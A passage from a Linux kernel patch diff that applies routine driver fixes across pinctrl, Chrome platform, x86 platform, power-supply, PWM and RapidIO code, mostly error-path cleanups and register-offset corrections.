++	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x60, 0x10, 23, 1),
++	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x60, 0x10, 21, 1),
++	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x60, 0x10, 27, 1),
++	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x60, 0x10, 25, 1),
+ 	PIN_FIELD_BASE(50, 57, IOCFG_RT_BASE, 0x40, 0x10, 2, 1),
+ 	PIN_FIELD_BASE(58, 58, IOCFG_RT_BASE, 0x40, 0x10, 1, 1),
+ 	PIN_FIELD_BASE(59, 59, IOCFG_RT_BASE, 0x40, 0x10, 0, 1),
+@@ -354,10 +354,10 @@ static const struct mtk_pin_field_calc mt7986_pin_r0_range[] = {
+ 	PIN_FIELD_BASE(38, 38, IOCFG_LT_BASE, 0x40, 0x10, 9, 1),
+ 	PIN_FIELD_BASE(39, 40, IOCFG_RB_BASE, 0x70, 0x10, 18, 1),
+ 	PIN_FIELD_BASE(41, 41, IOCFG_RB_BASE, 0x70, 0x10, 12, 1),
+-	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x70, 0x10, 22, 1),
+-	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x70, 0x10, 20, 1),
+-	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x70, 0x10, 26, 1),
+-	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x70, 0x10, 24, 1),
++	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x70, 0x10, 23, 1),
++	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x70, 0x10, 21, 1),
++	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x70, 0x10, 27, 1),
++	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x70, 0x10, 25, 1),
+ 	PIN_FIELD_BASE(50, 57, IOCFG_RT_BASE, 0x50, 0x10, 2, 1),
+ 	PIN_FIELD_BASE(58, 58, IOCFG_RT_BASE, 0x50, 0x10, 1, 1),
+ 	PIN_FIELD_BASE(59, 59, IOCFG_RT_BASE, 0x50, 0x10, 0, 1),
+@@ -392,10 +392,10 @@ static const struct mtk_pin_field_calc mt7986_pin_r1_range[] = {
+ 	PIN_FIELD_BASE(38, 38, IOCFG_LT_BASE, 0x50, 0x10, 9, 1),
+ 	PIN_FIELD_BASE(39, 40, IOCFG_RB_BASE, 0x80, 0x10, 18, 1),
+ 	PIN_FIELD_BASE(41, 41, IOCFG_RB_BASE, 0x80, 0x10, 12, 1),
+-	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x80, 0x10, 22, 1),
+-	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x80, 0x10, 20, 1),
+-	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x80, 0x10, 26, 1),
+-	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x80, 0x10, 24, 1),
++	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x80, 0x10, 23, 1),
++	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x80, 0x10, 21, 1),
++	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x80, 0x10, 27, 1),
++	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x80, 0x10, 25, 1),
+ 	PIN_FIELD_BASE(50, 57, IOCFG_RT_BASE, 0x60, 0x10, 2, 1),
+ 	PIN_FIELD_BASE(58, 58, IOCFG_RT_BASE, 0x60, 0x10, 1, 1),
+ 	PIN_FIELD_BASE(59, 59, IOCFG_RT_BASE, 0x60, 0x10, 0, 1),
+diff --git a/drivers/pinctrl/pinconf-generic.c b/drivers/pinctrl/pinconf-generic.c
+index 415d1df8f46a5..365c4b0ca4654 100644
+--- a/drivers/pinctrl/pinconf-generic.c
++++ b/drivers/pinctrl/pinconf-generic.c
+@@ -395,8 +395,10 @@ int pinconf_generic_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	for_each_available_child_of_node(np_config, np) {
+ 		ret = pinconf_generic_dt_subnode_to_map(pctldev, np, map,
+ 					&reserved_maps, num_maps, type);
+-		if (ret < 0)
++		if (ret < 0) {
++			of_node_put(np);
+ 			goto exit;
++		}
+ 	}
+ 	return 0;
+ 
+diff --git a/drivers/pinctrl/pinctrl-k210.c b/drivers/pinctrl/pinctrl-k210.c
+index ecab6bf63dc6d..ad4db99094a79 100644
+--- a/drivers/pinctrl/pinctrl-k210.c
++++ b/drivers/pinctrl/pinctrl-k210.c
+@@ -862,8 +862,10 @@ static int k210_pinctrl_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	for_each_available_child_of_node(np_config, np) {
+ 		ret = k210_pinctrl_dt_subnode_to_map(pctldev, np, map,
+ 						     &reserved_maps, num_maps);
+-		if (ret < 0)
++		if (ret < 0) {
++			of_node_put(np);
+ 			goto err;
++		}
+ 	}
+ 	return 0;
+ 
+diff --git a/drivers/pinctrl/pinctrl-ocelot.c b/drivers/pinctrl/pinctrl-ocelot.c
+index 687aaa6015555..3d5995cbcb782 100644
+--- a/drivers/pinctrl/pinctrl-ocelot.c
++++ b/drivers/pinctrl/pinctrl-ocelot.c
+@@ -2047,6 +2047,11 @@ static struct regmap *ocelot_pinctrl_create_pincfg(struct platform_device *pdev,
+ 	return devm_regmap_init_mmio(&pdev->dev, base, &regmap_config);
+ }
+ 
++static void ocelot_destroy_workqueue(void *data)
++{
++	destroy_workqueue(data);
++}
++
+ static int ocelot_pinctrl_probe(struct platform_device *pdev)
+ {
+ 	const struct ocelot_match_data *data;
+@@ -2078,6 +2083,11 @@ static int ocelot_pinctrl_probe(struct platform_device *pdev)
+ 	if (!info->wq)
+ 		return -ENOMEM;
+ 
++	ret = devm_add_action_or_reset(dev, ocelot_destroy_workqueue,
++				       info->wq);
++	if (ret)
++		return ret;
++
+ 	info->pincfg_data = &data->pincfg_data;
+ 
+ 	reset = devm_reset_control_get_optional_shared(dev, "switch");
+@@ -2119,15 +2129,6 @@ static int ocelot_pinctrl_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int ocelot_pinctrl_remove(struct platform_device *pdev)
+-{
+-	struct ocelot_pinctrl *info = platform_get_drvdata(pdev);
+-
+-	destroy_workqueue(info->wq);
+-
+-	return 0;
+-}
+-
+ static struct platform_driver ocelot_pinctrl_driver = {
+ 	.driver = {
+ 		.name = "pinctrl-ocelot",
+@@ -2135,7 +2136,6 @@ static struct platform_driver ocelot_pinctrl_driver = {
+ 		.suppress_bind_attrs = true,
+ 	},
+ 	.probe = ocelot_pinctrl_probe,
+-	.remove = ocelot_pinctrl_remove,
+ };
+ module_platform_driver(ocelot_pinctrl_driver);
+ 
+diff --git a/drivers/pinctrl/pinctrl-thunderbay.c b/drivers/pinctrl/pinctrl-thunderbay.c
+index 9328b17485cf0..590bbbf619afc 100644
+--- a/drivers/pinctrl/pinctrl-thunderbay.c
++++ b/drivers/pinctrl/pinctrl-thunderbay.c
+@@ -808,7 +808,7 @@ static int thunderbay_add_functions(struct thunderbay_pinctrl *tpc, struct funct
+ 					    funcs[i].num_group_names,
+ 					    funcs[i].data);
+ 	}
+-	kfree(funcs);
++
+ 	return 0;
+ }
+ 
+@@ -817,6 +817,7 @@ static int thunderbay_build_functions(struct thunderbay_pinctrl *tpc)
+ 	struct function_desc *thunderbay_funcs;
+ 	void *ptr;
+ 	int pin;
++	int ret;
+ 
+ 	/*
+ 	 * Allocate maximum possible number of functions. Assume every pin
+@@ -860,7 +861,10 @@ static int thunderbay_build_functions(struct thunderbay_pinctrl *tpc)
+ 		return -ENOMEM;
+ 
+ 	thunderbay_funcs = ptr;
+-	return thunderbay_add_functions(tpc, thunderbay_funcs);
++	ret = thunderbay_add_functions(tpc, thunderbay_funcs);
++
++	kfree(thunderbay_funcs);
++	return ret;
+ }
+ 
+ static int thunderbay_pinconf_set_tristate(struct thunderbay_pinctrl *tpc,
+diff --git a/drivers/platform/chrome/cros_ec_typec.c b/drivers/platform/chrome/cros_ec_typec.c
+index 2a7ff14dc37e9..59de4ce01faba 100644
+--- a/drivers/platform/chrome/cros_ec_typec.c
++++ b/drivers/platform/chrome/cros_ec_typec.c
+@@ -173,10 +173,13 @@ static int cros_typec_get_switch_handles(struct cros_typec_port *port,
+ 
+ role_sw_err:
+ 	typec_switch_put(port->ori_sw);
++	port->ori_sw = NULL;
+ ori_sw_err:
+ 	typec_retimer_put(port->retimer);
++	port->retimer = NULL;
+ retimer_sw_err:
+ 	typec_mux_put(port->mux);
++	port->mux = NULL;
+ mux_err:
+ 	return -ENODEV;
+ }
+diff --git a/drivers/platform/chrome/cros_usbpd_notify.c b/drivers/platform/chrome/cros_usbpd_notify.c
+index 4b5a81c9dc6da..10670b6588e3e 100644
+--- a/drivers/platform/chrome/cros_usbpd_notify.c
++++ b/drivers/platform/chrome/cros_usbpd_notify.c
+@@ -239,7 +239,11 @@ static int __init cros_usbpd_notify_init(void)
+ 		return ret;
+ 
+ #ifdef CONFIG_ACPI
+-	platform_driver_register(&cros_usbpd_notify_acpi_driver);
++	ret = platform_driver_register(&cros_usbpd_notify_acpi_driver);
++	if (ret) {
++		platform_driver_unregister(&cros_usbpd_notify_plat_driver);
++		return ret;
++	}
+ #endif
+ 	return 0;
+ }
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index 65b4a819f1bdf..c2c9b0d3244cb 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -358,7 +358,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_hnfnet_events[] = {
+ 	{ 0x32, "DDN_DIAG_W_INGRESS" },
+ 	{ 0x33, "DDN_DIAG_C_INGRESS" },
+ 	{ 0x34, "DDN_DIAG_CORE_SENT" },
+-	{ 0x35, "NDN_DIAG_S_OUT_OF_CRED" },
++	{ 0x35, "NDN_DIAG_N_OUT_OF_CRED" },
+ 	{ 0x36, "NDN_DIAG_S_OUT_OF_CRED" },
+ 	{ 0x37, "NDN_DIAG_E_OUT_OF_CRED" },
+ 	{ 0x38, "NDN_DIAG_W_OUT_OF_CRED" },
+diff --git a/drivers/platform/x86/huawei-wmi.c b/drivers/platform/x86/huawei-wmi.c
+index 5873c2663a65b..b85050e4a0d65 100644
+--- a/drivers/platform/x86/huawei-wmi.c
++++ b/drivers/platform/x86/huawei-wmi.c
+@@ -760,6 +760,9 @@ static int huawei_wmi_input_setup(struct device *dev,
+ 		const char *guid,
+ 		struct input_dev **idev)
+ {
++	acpi_status status;
++	int err;
++
+ 	*idev = devm_input_allocate_device(dev);
+ 	if (!*idev)
+ 		return -ENOMEM;
+@@ -769,10 +772,19 @@ static int huawei_wmi_input_setup(struct device *dev,
+ 	(*idev)->id.bustype = BUS_HOST;
+ 	(*idev)->dev.parent = dev;
+ 
+-	return sparse_keymap_setup(*idev, huawei_wmi_keymap, NULL) ||
+-		input_register_device(*idev) ||
+-		wmi_install_notify_handler(guid, huawei_wmi_input_notify,
+-				*idev);
++	err = sparse_keymap_setup(*idev, huawei_wmi_keymap, NULL);
++	if (err)
++		return err;
++
++	err = input_register_device(*idev);
++	if (err)
++		return err;
++
++	status = wmi_install_notify_handler(guid, huawei_wmi_input_notify, *idev);
++	if (ACPI_FAILURE(status))
++		return -EIO;
++
++	return 0;
+ }
+ 
+ static void huawei_wmi_input_exit(struct device *dev, const char *guid)
+diff --git a/drivers/platform/x86/intel/int3472/clk_and_regulator.c b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+index 1cf958983e868..b2342b3d78c72 100644
+--- a/drivers/platform/x86/intel/int3472/clk_and_regulator.c
++++ b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+@@ -185,7 +185,8 @@ int skl_int3472_register_regulator(struct int3472_discrete_device *int3472,
+ 	cfg.init_data = &init_data;
+ 	cfg.ena_gpiod = int3472->regulator.gpio;
+ 
+-	int3472->regulator.rdev = regulator_register(&int3472->regulator.rdesc,
++	int3472->regulator.rdev = regulator_register(int3472->dev,
++						     &int3472->regulator.rdesc,
+ 						     &cfg);
+ 	if (IS_ERR(int3472->regulator.rdev)) {
+ 		ret = PTR_ERR(int3472->regulator.rdev);
+diff --git a/drivers/platform/x86/intel_scu_ipc.c b/drivers/platform/x86/intel_scu_ipc.c
+index 7cc9089d1e14f..e7a3e34028178 100644
+--- a/drivers/platform/x86/intel_scu_ipc.c
++++ b/drivers/platform/x86/intel_scu_ipc.c
+@@ -583,7 +583,6 @@ __intel_scu_ipc_register(struct device *parent,
+ 	scu->dev.parent = parent;
+ 	scu->dev.class = &intel_scu_ipc_class;
+ 	scu->dev.release = intel_scu_ipc_release;
+-	dev_set_name(&scu->dev, "intel_scu_ipc");
+ 
+ 	if (!request_mem_region(scu_data->mem.start, resource_size(&scu_data->mem),
+ 				"intel_scu_ipc")) {
+@@ -612,6 +611,7 @@ __intel_scu_ipc_register(struct device *parent,
+ 	 * After this point intel_scu_ipc_release() takes care of
+ 	 * releasing the SCU IPC resources once refcount drops to zero.
+ 	 */
++	dev_set_name(&scu->dev, "intel_scu_ipc");
+ 	err = device_register(&scu->dev);
+ 	if (err) {
+ 		put_device(&scu->dev);
+diff --git a/drivers/platform/x86/mxm-wmi.c b/drivers/platform/x86/mxm-wmi.c
+index 9a19fbd2f7341..9a457956025a5 100644
+--- a/drivers/platform/x86/mxm-wmi.c
++++ b/drivers/platform/x86/mxm-wmi.c
+@@ -35,13 +35,11 @@ int mxm_wmi_call_mxds(int adapter)
+ 		.xarg = 1,
+ 	};
+ 	struct acpi_buffer input = { (acpi_size)sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	acpi_status status;
+ 
+ 	printk("calling mux switch %d\n", adapter);
+ 
+-	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input,
+-				     &output);
++	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input, NULL);
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return status;
+@@ -60,13 +58,11 @@ int mxm_wmi_call_mxmx(int adapter)
+ 		.xarg = 1,
+ 	};
+ 	struct acpi_buffer input = { (acpi_size)sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	acpi_status status;
+ 
+ 	printk("calling mux switch %d\n", adapter);
+ 
+-	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input,
+-				     &output);
++	status = wmi_evaluate_method(MXM_WMMX_GUID, 0x0, adapter, &input, NULL);
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return status;
+diff --git a/drivers/pnp/core.c b/drivers/pnp/core.c
+index 4df5aa6a309c3..6a60c5d83383b 100644
+--- a/drivers/pnp/core.c
++++ b/drivers/pnp/core.c
+@@ -148,14 +148,14 @@ struct pnp_dev *pnp_alloc_dev(struct pnp_protocol *protocol, int id,
+ 	dev->dev.coherent_dma_mask = dev->dma_mask;
+ 	dev->dev.release = &pnp_release_device;
+ 
+-	dev_set_name(&dev->dev, "%02x:%02x", dev->protocol->number, dev->number);
+-
+ 	dev_id = pnp_add_id(dev, pnpid);
+ 	if (!dev_id) {
+ 		kfree(dev);
+ 		return NULL;
+ 	}
+ 
++	dev_set_name(&dev->dev, "%02x:%02x", dev->protocol->number, dev->number);
++
+ 	return dev;
+ }
+ 
+diff --git a/drivers/power/supply/ab8500_charger.c b/drivers/power/supply/ab8500_charger.c
+index c19c50442761d..58757a5799f8b 100644
+--- a/drivers/power/supply/ab8500_charger.c
++++ b/drivers/power/supply/ab8500_charger.c
+@@ -3719,7 +3719,14 @@ static int __init ab8500_charger_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return platform_driver_register(&ab8500_charger_driver);
++	ret = platform_driver_register(&ab8500_charger_driver);
++	if (ret) {
++		platform_unregister_drivers(ab8500_charger_component_drivers,
++				ARRAY_SIZE(ab8500_charger_component_drivers));
++		return ret;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit ab8500_charger_exit(void)
+diff --git a/drivers/power/supply/bq25890_charger.c b/drivers/power/supply/bq25890_charger.c
+index 6020b58c641d2..0e15302b8df22 100644
+--- a/drivers/power/supply/bq25890_charger.c
++++ b/drivers/power/supply/bq25890_charger.c
+@@ -1049,6 +1049,36 @@ static const struct regulator_desc bq25890_vbus_desc = {
+ 	.fixed_uV = 5000000,
+ 	.n_voltages = 1,
+ };
++
++static int bq25890_register_regulator(struct bq25890_device *bq)
++{
++	struct bq25890_platform_data *pdata = dev_get_platdata(bq->dev);
++	struct regulator_config cfg = {
++		.dev = bq->dev,
++		.driver_data = bq,
++	};
++	struct regulator_dev *reg;
++
++	if (!IS_ERR_OR_NULL(bq->usb_phy))
++		return 0;
++
++	if (pdata)
++		cfg.init_data = pdata->regulator_init_data;
++
++	reg = devm_regulator_register(bq->dev, &bq25890_vbus_desc, &cfg);
++	if (IS_ERR(reg)) {
++		return dev_err_probe(bq->dev, PTR_ERR(reg),
++				     "registering vbus regulator");
++	}
++
++	return 0;
++}
++#else
++static inline int
++bq25890_register_regulator(struct bq25890_device *bq)
++{
++	return 0;
++}
+ #endif
+ 
+ static int bq25890_get_chip_version(struct bq25890_device *bq)
+@@ -1189,8 +1219,14 @@ static int bq25890_fw_probe(struct bq25890_device *bq)
+ 	return 0;
+ }
+ 
+-static int bq25890_probe(struct i2c_client *client,
+-			 const struct i2c_device_id *id)
++static void bq25890_non_devm_cleanup(void *data)
++{
++	struct bq25890_device *bq = data;
++
++	cancel_delayed_work_sync(&bq->pump_express_work);
++}
++
++static int bq25890_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+ 	struct bq25890_device *bq;
+@@ -1244,27 +1280,24 @@ static int bq25890_probe(struct i2c_client *client,
+ 
+ 	/* OTG reporting */
+ 	bq->usb_phy = devm_usb_get_phy(dev, USB_PHY_TYPE_USB2);
++
++	/*
++	 * This must be before bq25890_power_supply_init(), so that it runs
++	 * after devm unregisters the power_supply.
++	 */
++	ret = devm_add_action_or_reset(dev, bq25890_non_devm_cleanup, bq);
++	if (ret)
++		return ret;
++
++	ret = bq25890_register_regulator(bq);
++	if (ret)
++		return ret;
++
+ 	if (!IS_ERR_OR_NULL(bq->usb_phy)) {
+ 		INIT_WORK(&bq->usb_work, bq25890_usb_work);
+ 		bq->usb_nb.notifier_call = bq25890_usb_notifier;
+ 		usb_register_notifier(bq->usb_phy, &bq->usb_nb);
+ 	}
+-#ifdef CONFIG_REGULATOR
+-	else {
+-		struct bq25890_platform_data *pdata = dev_get_platdata(dev);
+-		struct regulator_config cfg = { };
+-		struct regulator_dev *reg;
+-
+-		cfg.dev = dev;
+-		cfg.driver_data = bq;
+-		if (pdata)
+-			cfg.init_data = pdata->regulator_init_data;
+-
+-		reg = devm_regulator_register(dev, &bq25890_vbus_desc, &cfg);
+-		if (IS_ERR(reg))
+-			return dev_err_probe(dev, PTR_ERR(reg), "registering regulator");
+-	}
+-#endif
+ 
+ 	ret = bq25890_power_supply_init(bq);
+ 	if (ret < 0) {
+@@ -1400,7 +1433,7 @@ static struct i2c_driver bq25890_driver = {
+ 		.acpi_match_table = ACPI_PTR(bq25890_acpi_match),
+ 		.pm = &bq25890_pm,
+ 	},
+-	.probe = bq25890_probe,
++	.probe_new = bq25890_probe,
+ 	.remove = bq25890_remove,
+ 	.shutdown = bq25890_shutdown,
+ 	.id_table = bq25890_i2c_ids,
+diff --git a/drivers/power/supply/cw2015_battery.c b/drivers/power/supply/cw2015_battery.c
+index 6d52641151d9a..473522b4326ad 100644
+--- a/drivers/power/supply/cw2015_battery.c
++++ b/drivers/power/supply/cw2015_battery.c
+@@ -699,6 +699,9 @@ static int cw_bat_probe(struct i2c_client *client)
+ 	}
+ 
+ 	cw_bat->battery_workqueue = create_singlethread_workqueue("rk_battery");
++	if (!cw_bat->battery_workqueue)
++		return -ENOMEM;
++
+ 	devm_delayed_work_autocancel(&client->dev,
+ 							  &cw_bat->battery_delay_work, cw_bat_work);
+ 	queue_delayed_work(cw_bat->battery_workqueue,
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 4b5fb172fa994..01d1ac79d982e 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -750,6 +750,11 @@ int power_supply_get_battery_info(struct power_supply *psy,
+ 		int i, tab_len, size;
+ 
+ 		propname = kasprintf(GFP_KERNEL, "ocv-capacity-table-%d", index);
++		if (!propname) {
++			power_supply_put_battery_info(psy, info);
++			err = -ENOMEM;
++			goto out_put_node;
++		}
+ 		list = of_get_property(battery_np, propname, &size);
+ 		if (!list || !size) {
+ 			dev_err(&psy->dev, "failed to get %s\n", propname);
+@@ -1387,8 +1392,8 @@ create_triggers_failed:
+ register_cooler_failed:
+ 	psy_unregister_thermal(psy);
+ register_thermal_failed:
+-	device_del(dev);
+ wakeup_init_failed:
++	device_del(dev);
+ device_add_failed:
+ check_supplies_failed:
+ dev_set_name_failed:
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index f20a6ac584ccd..4f9c1c4179165 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -1060,8 +1060,10 @@ static int rk817_charger_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 
+ 	charger = devm_kzalloc(&pdev->dev, sizeof(*charger), GFP_KERNEL);
+-	if (!charger)
++	if (!charger) {
++		of_node_put(node);
+ 		return -ENOMEM;
++	}
+ 
+ 	charger->rk808 = rk808;
+ 
+diff --git a/drivers/power/supply/z2_battery.c b/drivers/power/supply/z2_battery.c
+index 1897c29848600..d033c1d3ee42a 100644
+--- a/drivers/power/supply/z2_battery.c
++++ b/drivers/power/supply/z2_battery.c
+@@ -206,10 +206,12 @@ static int z2_batt_probe(struct i2c_client *client,
+ 
+ 	charger->charge_gpiod = devm_gpiod_get_optional(&client->dev,
+ 							NULL, GPIOD_IN);
+-	if (IS_ERR(charger->charge_gpiod))
+-		return dev_err_probe(&client->dev,
++	if (IS_ERR(charger->charge_gpiod)) {
++		ret = dev_err_probe(&client->dev,
+ 				     PTR_ERR(charger->charge_gpiod),
+ 				     "failed to get charge GPIO\n");
++		goto err;
++	}
+ 
+ 	if (charger->charge_gpiod) {
+ 		gpiod_set_consumer_name(charger->charge_gpiod, "BATT CHRG");
+diff --git a/drivers/pwm/pwm-mediatek.c b/drivers/pwm/pwm-mediatek.c
+index 6901a44dc428d..a337b47dc2f7d 100644
+--- a/drivers/pwm/pwm-mediatek.c
++++ b/drivers/pwm/pwm-mediatek.c
+@@ -296,7 +296,7 @@ static const struct pwm_mediatek_of_data mt6795_pwm_data = {
+ static const struct pwm_mediatek_of_data mt7622_pwm_data = {
+ 	.num_pwms = 6,
+ 	.pwm45_fixup = false,
+-	.has_ck_26m_sel = false,
++	.has_ck_26m_sel = true,
+ };
+ 
+ static const struct pwm_mediatek_of_data mt7623_pwm_data = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index c605013e4114c..3fbb4bae93a4e 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -178,7 +178,7 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ {
+ 	struct mtk_disp_pwm *mdp = to_mtk_disp_pwm(chip);
+ 	u64 rate, period, high_width;
+-	u32 clk_div, con0, con1;
++	u32 clk_div, pwm_en, con0, con1;
+ 	int err;
+ 
+ 	err = clk_prepare_enable(mdp->clk_main);
+@@ -197,7 +197,8 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 	rate = clk_get_rate(mdp->clk_main);
+ 	con0 = readl(mdp->base + mdp->data->con0);
+ 	con1 = readl(mdp->base + mdp->data->con1);
+-	state->enabled = !!(con0 & BIT(0));
++	pwm_en = readl(mdp->base + DISP_PWM_EN);
++	state->enabled = !!(pwm_en & mdp->data->enable_mask);
+ 	clk_div = FIELD_GET(PWM_CLKDIV_MASK, con0);
+ 	period = FIELD_GET(PWM_PERIOD_MASK, con1);
+ 	/*
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index 2d4fa5e5fdd46..bb72393134016 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -204,8 +204,11 @@ static int pwm_sifive_clock_notifier(struct notifier_block *nb,
+ 	struct pwm_sifive_ddata *ddata =
+ 		container_of(nb, struct pwm_sifive_ddata, notifier);
+ 
+-	if (event == POST_RATE_CHANGE)
++	if (event == POST_RATE_CHANGE) {
++		mutex_lock(&ddata->lock);
+ 		pwm_sifive_update_clock(ddata, ndata->new_rate);
++		mutex_unlock(&ddata->lock);
++	}
+ 
+ 	return NOTIFY_OK;
+ }
+diff --git a/drivers/pwm/pwm-tegra.c b/drivers/pwm/pwm-tegra.c
+index dad9978c91861..249dc01932979 100644
+--- a/drivers/pwm/pwm-tegra.c
++++ b/drivers/pwm/pwm-tegra.c
+@@ -145,8 +145,19 @@ static int tegra_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		 * source clock rate as required_clk_rate, PWM controller will
+ 		 * be able to configure the requested period.
+ 		 */
+-		required_clk_rate =
+-			(NSEC_PER_SEC / period_ns) << PWM_DUTY_WIDTH;
++		required_clk_rate = DIV_ROUND_UP_ULL((u64)NSEC_PER_SEC << PWM_DUTY_WIDTH,
++						     period_ns);
++
++		if (required_clk_rate > clk_round_rate(pc->clk, required_clk_rate))
++			/*
++			 * required_clk_rate is a lower bound for the input
++			 * rate; for lower rates there is no value for PWM_SCALE
++			 * that yields a period less than or equal to the
++			 * requested period. Hence, for lower rates, double the
++			 * required_clk_rate to get a clock rate that can meet
++			 * the requested period.
++			 */
++			required_clk_rate *= 2;
+ 
+ 		err = dev_pm_opp_set_rate(pc->dev, required_clk_rate);
+ 		if (err < 0)
+diff --git a/drivers/rapidio/devices/rio_mport_cdev.c b/drivers/rapidio/devices/rio_mport_cdev.c
+index 2cdc054e53a53..43db495f19861 100644
+--- a/drivers/rapidio/devices/rio_mport_cdev.c
++++ b/drivers/rapidio/devices/rio_mport_cdev.c
+@@ -1804,8 +1804,11 @@ static int rio_mport_add_riodev(struct mport_cdev_priv *priv,
+ 		rio_init_dbell_res(&rdev->riores[RIO_DOORBELL_RESOURCE],
+ 				   0, 0xffff);
+ 	err = rio_add_device(rdev);
+-	if (err)
+-		goto cleanup;
++	if (err) {
++		put_device(&rdev->dev);
++		return err;
++	}
++
+ 	rio_dev_get(rdev);
+ 
+ 	return 0;
+@@ -1901,10 +1904,6 @@ static int mport_cdev_open(struct inode *inode, struct file *filp)
+ 
+ 	priv->md = chdev;
+ 
+-	mutex_lock(&chdev->file_mutex);
+-	list_add_tail(&priv->list, &chdev->file_list);
+-	mutex_unlock(&chdev->file_mutex);
+-
+ 	INIT_LIST_HEAD(&priv->db_filters);
+ 	INIT_LIST_HEAD(&priv->pw_filters);
+ 	spin_lock_init(&priv->fifo_lock);
+@@ -1913,6 +1912,7 @@ static int mport_cdev_open(struct inode *inode, struct file *filp)
+ 			  sizeof(struct rio_event) * MPORT_EVENT_DEPTH,
+ 			  GFP_KERNEL);
+ 	if (ret < 0) {
++		put_device(&chdev->dev);
+ 		dev_err(&chdev->dev, DRV_NAME ": kfifo_alloc failed\n");
+ 		ret = -ENOMEM;
+ 		goto err_fifo;
+@@ -1923,6 +1923,9 @@ static int mport_cdev_open(struct inode *inode, struct file *filp)
+ 	spin_lock_init(&priv->req_lock);
+ 	mutex_init(&priv->dma_lock);
+ #endif
++	mutex_lock(&chdev->file_mutex);
++	list_add_tail(&priv->list, &chdev->file_list);
++	mutex_unlock(&chdev->file_mutex);
+ 
+ 	filp->private_data = priv;
+ 	goto out;
+diff --git a/drivers/rapidio/rio-scan.c b/drivers/rapidio/rio-scan.c
+index 19b0c33f4a62a..fdcf742b2adbc 100644
+--- a/drivers/rapidio/rio-scan.c
++++ b/drivers/rapidio/rio-scan.c
+@@ -454,8 +454,12 @@ static struct rio_dev *rio_setup_device(struct rio_net *net,
+ 				   0, 0xffff);
+ 
+ 	ret = rio_add_device(rdev);
+-	if (ret)
+-		goto cleanup;
++	if (ret) {
++		if (rswitch)
++			kfree(rswitch->route_table);
++		put_device(&rdev->dev);
++		return NULL;
++	}
+ 
+ 	rio_dev_get(rdev);
+ 
+diff --git a/drivers/rapidio/rio.c b/drivers/rapidio/rio.c
+index e74cf09eeff07..9544b8ee0c963 100644
+--- a/drivers/rapidio/rio.c
++++ b/drivers/rapidio/rio.c
+@@ -2186,11 +2186,16 @@ int rio_register_mport(struct rio_mport *port)
+ 	atomic_set(&port->state, RIO_DEVICE_RUNNING);
+ 
+ 	res = device_register(&port->dev);
+-	if (res)
++	if (res) {
+ 		dev_err(&port->dev, "RIO: mport%d registration failed ERR=%d\n",
+ 			port->id, res);
+-	else
++		mutex_lock(&rio_mport_list_lock);
++		list_del(&port->node);
++		mutex_unlock(&rio_mport_list_lock);
++		put_device(&port->dev);
++	} else {
+ 		dev_dbg(&port->dev, "RIO: registered mport%d\n", port->id);
++	}
+ 
+ 	return res;
+ }
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index e8c00a884f1f1..3716ba060368c 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
